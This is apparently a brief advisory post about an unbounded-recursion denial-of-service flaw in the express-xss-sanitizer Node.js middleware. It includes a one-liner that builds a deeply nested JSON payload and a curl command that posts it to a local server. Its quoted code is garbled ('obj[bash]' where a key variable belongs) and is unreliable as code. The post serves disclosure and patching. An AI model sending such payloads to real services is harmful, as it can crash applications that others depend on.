Listen to this Post
The vulnerability exists in the `sanitize` function within `lib/sanitize.js` of the express-xss-sanitizer middleware. This function is designed to recursively traverse and sanitize user-supplied objects to remove potential XSS payloads. However, the recursion lacks a depth limit. When the middleware processes a request containing a JSON object with extremely deep nesting (e.g., `{“a”: {“a”: {“a”: …}}}` repeated thousands of times), each level of nesting triggers a recursive call to the `sanitize` function. This continuous recursion without a base case for depth consumes the call stack. In Node.js, which has a finite call stack size, this leads to a stack overflow error, abruptly terminating the application process and causing a denial-of-service condition.
Platform: Node.js/Express.js
Version: <2.0.1
Vulnerability: Unbounded Recursion
Severity: Moderate
date: 2025-09-26
Prediction: Patch available (v2.0.1)
What Undercode Say:
Simulating a deep nested object for testing
node -e "let obj = {}; let current = obj; for(let i=0; i<50000; i++) { current.a = {}; current = current.a; }; console.log(JSON.stringify(obj))" > payload.json
curl -X POST -H "Content-Type: application/json" -d @payload.json http://localhost:3000/submit-form
// Code snippet from vulnerable version (lib/sanitize.js)
function sanitize(obj) {
if (typeof obj === 'object') {
for (let key in obj) {
obj[bash] = sanitize(obj[bash]); // Unbounded recursion
}
}
// ... sanitization logic
return obj;
}
How Exploit:
Craft a deeply nested JSON payload and send it via POST request.
Protection from this CVE
Upgrade to version 2.0.1.
Impact:
Denial-of-Service (Application Crash)
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
